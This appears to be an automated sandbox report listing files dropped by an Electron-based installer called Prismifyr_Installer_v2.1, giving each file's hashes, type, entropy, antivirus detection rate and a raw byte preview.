                                                                                                                                                                                                                        SHA1:939BB742A354A92E1DCD3661A62D69E48030A335
                                                                                                                                                                                                                        SHA-256:DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
                                                                                                                                                                                                                        SHA-512:4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..............C.......C.....C................................"...C...............................................Rich............................PE..d....-!e.........." ...#.>..........XG....................................................`.............................................X.......<....`.......0..$............p..........p...............................@............P..........@....................text...`=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....pdata..$....0......................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):723774
                                                                                                                                                                                                                        Entropy (8bit):7.929666169821963
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:HZ/HLvaMWGmn4woKZc9FwK2iIeOEM8505vPRm+OjEYLtMK26MS6NNu8qCKOhiHlP:HpLdWGWrUInEB5CZmuYLtL26MS6H7KO8
                                                                                                                                                                                                                        MD5:2F89AF054F06FFA920DA05F08AB9021D
                                                                                                                                                                                                                        SHA1:381ACF8F43551143AE51F1557C72903C25647412
                                                                                                                                                                                                                        SHA-256:A8E754F496AE6DC88DC8876FBA62E817AE600EA6C03D88453D81F49D71CDFFAB
                                                                                                                                                                                                                        SHA-512:8CA71BD3B5B8D22AF2C65F2C6B3E403BFF9F9DD8C0495A2125284A2735E15015F960E0D3BCCDEE8CB75FBCB6190895A0D23840ED62234D39046DBAA1855F25FD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mG....].........t....37f...w4.=...H.A....^H .......0.........#t..... .....U..........".../....R.z..:.S~^M.g..t.....m~...g..=i..91}..fM....9!.....zQ|..*..5I....q.t.}..|..}.&.......F......b..}l..G.).......t.J..`....=.L.^.=...I.9........~....9.=.91.......o.t?~.XL.t?v..|..E.......3.~...L}H..#.=0.9..}.....1>........#1....}.m.YT0....;.O,..zW...w..e.;.....s.v..?....L..G.Eo..z..{ ...?.9.+V.....m_c..E..~.L.[..{..|......j.n....y...xSf..7....>....KR.`.....Pu.x...R...R\k....}j..>..K..j`.y...S{_.....j.>i........}.4}..[..u9.t..%.K9{..A.......T...:.^.....}...X.O.d...)gYj..Ky.K.K...W.9..>.].....hK...].....m`.h.4...NW...{^_-.#...K.t.~...WT............N.U..............%.^.Y.K.n....c~Y..K.._....X..;...O{....c`...R|.4.P.j..g.mwi.........y..M.n.......V...... ...v....m.....Z.e.5......j.x....%.-.uS....q...{.b.O...Uw.s^g..rL....b
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x68c, 10 symbols, created Thu Oct 24 11:52:54 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1860
                                                                                                                                                                                                                        Entropy (8bit):4.450602963572197
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:Hj3W9lazks6XX+faHawK2MaTfIl2xDEuZhN9utaEYiPNnquVm4+A8AlYlPC:7fzAtRK2JTwl2uulAtVYuquV8ElYw
                                                                                                                                                                                                                        MD5:BBA77B0F20700465FAB6C55B5AD1B91D
                                                                                                                                                                                                                        SHA1:2FF8C3CEFD7CC5C6B476458B3A37C3F97FA0B3E2
                                                                                                                                                                                                                        SHA-256:5D86E40B43EF36639D3BBA9724B02F339A1E4D62F3F2D4EA4B953ED63F93A253
                                                                                                                                                                                                                        SHA-512:F79F5ECB99F515B1E7198E199B55A18759758E8F7124EC4F2EBB0463CFE75515243C1F9F9321AE1BCC6E294BC52AB16F9E02D66C3B872412ED449DFF8F669D79
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:L....5.g.............debug$S........t...................@..B.rsrc$01............................@..@.rsrc$02............................@..@........[....c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP....................$g.T...F.............7.......C:\Users\user\AppData\Local\Temp\RES9E2A.tmp.-.<....................a..Microsoft (R) CVTRES.x.=..cwd.C:\Users\user\AppData\Local\Temp\screenCapture.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................t...............^...............................t.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1722368
                                                                                                                                                                                                                        Entropy (8bit):6.559553036482321
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:OMMdw/xGhYiRWVNx74QE5MOTQsoXYk5DWxIHk/KZSwM/1rg5Wpf:OgNxI5MWQsCd5qmE/rC
                                                                                                                                                                                                                        MD5:127FC9433C0F922BB485EF3CDAE0120B
                                                                                                                                                                                                                        SHA1:F7D8AEBB4B9001F2024A5AC70C04AB2DBFDE4819
                                                                                                                                                                                                                        SHA-256:58907A746AB3DE2D68E914B98CB675EC7BE892A8CC882B9173CA4AD1B6B6680C
                                                                                                                                                                                                                        SHA-512:74F00FB0D1E9CDA9A4747A26F7A71FF4A347C642E6B40EF6CA37D933DE86899BC413A49DF004FF32FA522E4010A5AC712C9DA00F898344DE1C44ED2A6950F1A6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..yO_.yO_.yO_..K^.yO_..L^.yO_..J^!yO_..K^.yO_..L^.yO_..J^.yO_..N^.yO_.yN_|yO_y.F^.yO_y.O^.yO_y.._.yO_y.M^.yO_Rich.yO_................PE..d...!..g.........." .....\..........<.....................................................`.........................................p...........(...............................8.......p............................G..8............p..........@....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data... f.......P..................@....pdata...............F..............@..@_RDATA.......p......................@..@.rsrc................0..............@..@.reloc..8............2..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1096
                                                                                                                                                                                                                        Entropy (8bit):5.13006727705212
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                                                        MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                                                        SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                                                        SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                                                        SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9431332
                                                                                                                                                                                                                        Entropy (8bit):4.776029024260704
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:G8QQf6Ox6j1newR6Xe1VmfQ6k6T6W6r656+eGj7dOp+:fGyeGd
                                                                                                                                                                                                                        MD5:C5DE877A372447FDD303C1026FB432F2
                                                                                                                                                                                                                        SHA1:6FC0A751EDACBE061E97248FA550691225891030
                                                                                                                                                                                                                        SHA-256:4BF4DD1A05ECBA975C90D85117DEA74B0E94114F882BB26A7E7D1029AFE8FDA8
                                                                                                                                                                                                                        SHA-512:B3079B18419CA854118E12E8D4681C9E66AE55FBB1F69CFB3EF6322A1C17557C0ADBFAB5CED030133AF814D39483A2B5C7090CA3ABB545E8808FFB6ABE6B3AE6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<label class="show show-all" tabindex="0">.<input type="checkbox" hidden>.</label>.<div class="open-sourced">. Chromium software is made available as source code. <a href="https://source.chromium.org/chromium">here</a>..</div>..<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<labe
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):186389504
                                                                                                                                                                                                                        Entropy (8bit):6.755948449281348
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:AafJfQkKEVr6FTkCbxqd6PgLAAez2YCSXczL2UG4kbffUgAPqpL44fQ4lTX3omTB:D5kbdbB39f
                                                                                                                                                                                                                        MD5:F90856B824B429A51D390C25F21C9683
                                                                                                                                                                                                                        SHA1:D0EDD6E25D5C7B50C320794C956AE63A0012620A
                                                                                                                                                                                                                        SHA-256:147327A853ADCEDDCF49A5CF07E7A727E87798F399E3AF5680909B640DE4DBE4
                                                                                                                                                                                                                        SHA-512:B51B39808E961EAC513CD42E3B5030F0BF3268DC91DE4B3CC17B8B7C1C38B214935783E02204EE3F5BAECA0037B16BC23DC26DDDB6D9F9B3A970DE092D6415F4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......f%......... C~........@............................. [...........`......................................... ........;..h.....H..........%I...........K.$&..............................(.....%.@...........0R.......b.......................text....e%......f%................. ..`.rdata........%......l%.............@..@.data.....H..0...>..................@....pdata...%I......&I..P..............@..@.gxfg....B....H..D...v..............@..@.retplne.....PH..........................rodata......`H..................... ..`.tls..........H.....................@...CPADinfo8.....H.....................@...LZMADEC.......H..................... ..`_RDATA........H.....................@..@malloc_h......H..................... ..`prot..........H.....................@..@.rsrc.........H.....................@..@.reloc..$&....K..(..................@..B................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):151326
                                                                                                                                                                                                                        Entropy (8bit):7.91733776058705
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:Mz8JCGIdkwTPa/XKjKkxP1L2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:Mz81Idk8a4Kkx5K18Gb0OV8ld0GecQ35
                                                                                                                                                                                                                        MD5:3C72D78266A90ED10DC0B0DA7FDC6790
                                                                                                                                                                                                                        SHA1:6690EB15B179C8790E13956527EBBF3D274EEF9B
                                                                                                                                                                                                                        SHA-256:14A6A393C60F62DF9BC1036E98346CD557E0AE73E8C7552D163FA64DA77804D7
                                                                                                                                                                                                                        SHA-512:B1BABF1C37B566A5F0E5F84156F7AB59872690BA0BDD51850525F86769BFEBC245F83988A3508945CF7617D73CD25E8469228974DD2C38415388B6A378552420
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..........<.....................V...........C.......................4...........i.....9......!.....%....:'.....1.....<....f?.....C.....G.....I.....J.....M.....O.....R....vV.....Z.....]....H`.....a....-c....Td.....f..%..f..&..l..(.Dr..+..v..3..y..4..}..=.....>.....?.3...A.....E.....F.....I....J.%...K....L.....V.....W.u...X.....Y.=....+....L.................. ....1........".....#.....$.....%.....&.....'.....,.,...-........ ....#....%.........0.....3...."9....2D.....E.....N.....T....QZ...._....f....Mh.....l....p....Ez....e}..............A.....y..........G................x....................................k.....B..........F...........X..........!...!.O...".....$.B...%....*.B...,.....-.........F.....G....H.b...I.....J.h...K.=...L.....M.....N.....O....P.....Q.n...R.....S....T....U....V.....W.|...Y.@!..Z.."..[.."..\.#..].e$..^..%.._..%..`..'..a..(..b..)..e..,.....1...."2....y2.....2....n3....4....e5....5.....6....U6....6.....6.....<.....@....bA.....A
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):228242
                                                                                                                                                                                                                        Entropy (8bit):7.947127774301086
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:HDQYajN6svyABnI86uKkxugx5GMRejnbdZnVE6YoppO4:sfjN6svyABTKkxa6edhVELoXO4
                                                                                                                                                                                                                        MD5:3969308AAE1DC1C2105BBD25901BCD01
                                                                                                                                                                                                                        SHA1:A32F3C8341944DA75E3EED5EF30602A98EC75B48
                                                                                                                                                                                                                        SHA-256:20C93F2CFD69F3249CDFD46F317B37A9432ECC0DE73323D24ECF65CE0F3C1BB6
                                                                                                                                                                                                                        SHA-512:F81ED1890B46F7D9F6096B9EF5DAAB5B21788952EFB5C4DCD6B8FD43E4673A91607C748F31434C84A180D943928D83928037058493E7E9B48C3DE1FC8025DF7F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..........<......... .........................................v%.....*.....-....25.....:.....>....=G.....K....._....Yt....uy.....................g........................................|...........b...........6...%.....&.z...(.J...+.....3.....4.....=.r...>."...?.....A.....E.....F..#..I.c+..J..7..K..?..L..F..V..J..W.~M..X..R..Y.nS....T....X....[....^...a....d....i....l.."..p..#..r..$..s..%..t..&..u..'..v..,.,w..-..................".....d.....m........................................X................x...... .....#....-.....0....#9.....=.....F.....Q....KU.....V....._....Kh.....j....>m....Kq....`x....xy.........`...............^.....\.....I.....j.....[........!...."....$....%.S...*....,.....-..........F....G.....H.....I.....J....K.:...L.....M.-...N.....O.|...P.....Q....R....S.f...T.G...U._ ..V.e&..W..,..Y..1..Z.J3..[.@4..\.c5..].6..^.7.._.8..`.p:..a.$<..b..=..e.J....Z.....Z....G[....[....T\....]....c^....^....._....w_....._.....`....?f....5j.....j....Mk
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4916728
                                                                                                                                                                                                                        Entropy (8bit):6.398031738914566
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:hCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRN1:oG2QCwmHjnog/pzHAo/Ayc
                                                                                                                                                                                                                        MD5:A7B7470C347F84365FFE1B2072B4F95C
                                                                                                                                                                                                                        SHA1:57A96F6FB326BA65B7F7016242132B3F9464C7A3
                                                                                                                                                                                                                        SHA-256:AF7B99BE1B8770C0E4D18E43B04E81D11BDEB667FA6B07ADE7A88F4C5676BF9A
                                                                                                                                                                                                                        SHA-512:83391A219631F750499FD9642D59EC80FB377C378997B302D10762E83325551BB97C1086B181FFF0521B1CA933E518EAB71A44A3578A23691F215EBB1DCE463D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K......JK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2924544
                                                                                                                                                                                                                        Entropy (8bit):6.704464688156766
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:2kzMF+in6Rjp84IEeOUmlyNTzk74y0V+X6CfTBPwN/4MT+fc0:2kXpCOUyy5Z96Q/Wk
                                                                                                                                                                                                                        MD5:070710A53A0F388A2967D6084228DB12
                                                                                                                                                                                                                        SHA1:34E72D2AEFD79AEE42BF85D6AAFF35B82AB1EF65
                                                                                                                                                                                                                        SHA-256:4813EFA3758EE8AAC161FE00806F9EC4B65E31886FFA2075115D4986F9D05205
                                                                                                                                                                                                                        SHA-512:12558C42135CDF3BDF5A24DA235C48DA5A28789C90CDEBF85FEA5746BA18BBD4428F9A8F0A47876D2ACF4E22EEB04AEA96A0317F8480082073D42FAAD8306952
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." ......#..........k........................................:...........`A........................................0.*.......*.(............p9..............:.@5..,.*.......................*.(.....$.@...........x.*.8............................text.....#.......#................. ..`.rdata..D.....$.......#.............@..@.data.........+.."...p+.............@....pdata......p9.......+.............@..@.gxfg....+... :..,...8,.............@..@.retplne.....P:......d,..................tls.........`:......f,.............@..._RDATA.......p:......h,.............@..@.reloc..@5....:..6...j,.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):10468208
                                                                                                                                                                                                                        Entropy (8bit):6.265606239082294
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:196608:+SPBhORiYAXHiXUxY/iJ53IWhlVjEeIu2Y6U:++wkpHiXUxY/iJ53IWhlVjEeIZU
                                                                                                                                                                                                                        MD5:FFD67C1E24CB35DC109A24024B1BA7EC
                                                                                                                                                                                                                        SHA1:99F545BC396878C7A53E98A79017D9531AF7C1F5
                                                                                                                                                                                                                        SHA-256:9AE98C06CBB0EA43C5CD6B5725310C008C65E46072421A1118CB88E1DE9A8B92
                                                                                                                                                                                                                        SHA-512:E1A865E685D2D3BACD0916D4238A79462519D887FEB273A251120BB6AF2B4481D025F3B21CE9A1A95A49371A0AA3ECF072175BA756974E831DBFDE1F0FEAEB79
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E...(...E...)...F...).."F...1..5F..`1..EF...N..XF..PN..hF...N..xF.......F.......F.......F..@....F.......F......F..0....F.......G......$G......7G......JG......]G..@...pG.......G.......G..@....G.......G.......G..@....G.......G..p....H..`....H.......H..@...AH......TH..p...gH.....zH.......H..`....H.......H.......H..P....H.......H......H..`....I......%I..P...:I......RI.....bI..@...uI.......I.......I.......I..P....I.......I.......I..0....I.......J... ...J.. !..-J..@$..=J...$..PJ...$..qJ.......J...<...J....&..J....&..J.. .&..J....&..K..`.&..K....&.3K....&.JK..0.&.aK....'.xK....'..K....'..K...(..K....(..K...O)..K....)..L..0Q*.>L..`.*.gL..Pi+..L....+..L...i,..L....,..L..P}-..M..@.-.,M.. .-.EM....-.\M....-.uM....-..M...$...M..0%...M....0..M...j0..M..`.0..N..p.0.1N....0.AN....0.TN..@.0.iN....0..N..0.0..N....0..N....0..N....1..N....1..N..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):484352
                                                                                                                                                                                                                        Entropy (8bit):6.370928516739512
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:teoMqSwktU6O8J6AGrIKLD0Rv8KRWAwi+u7fSGSQtZu:ZMeAQ8JFGrIKLDW9W2+u7fSGSb
                                                                                                                                                                                                                        MD5:0109839C82BFB399D68D906DEF2E3618
                                                                                                                                                                                                                        SHA1:11879DA345C681DB933A893954A08F8DF6923636
                                                                                                                                                                                                                        SHA-256:1393633DCCB633E44F717A3737E4B88315662856916FE534B5F9017E15464074
                                                                                                                                                                                                                        SHA-512:B25AD5F24E20654622C53CE89D6AFF0678179F823CB446110AB64ECCA8E2688D5E98582985699D82C473D87F31AD12398DDFE6911B970021C96EBC587F8A06B3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." .....L................................................................`A.........................................L.......[..(.......x....0...?..............<....D.......................C..(....`..@............^...............................text...:K.......L.................. ..`.rdata...q...`...r...P..............@..@.data....K....... ..................@....pdata...?...0...@..................@..@.gxfg... &...p...(..."..............@..@.retplne.............J...................tls....!............L..............@..._RDATA...............N..............@..@.rsrc...x............P..............@..@.reloc..<............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8364544
                                                                                                                                                                                                                        Entropy (8bit):6.49454047094872
                                                                                                                                                                                                                        Encrypted:false
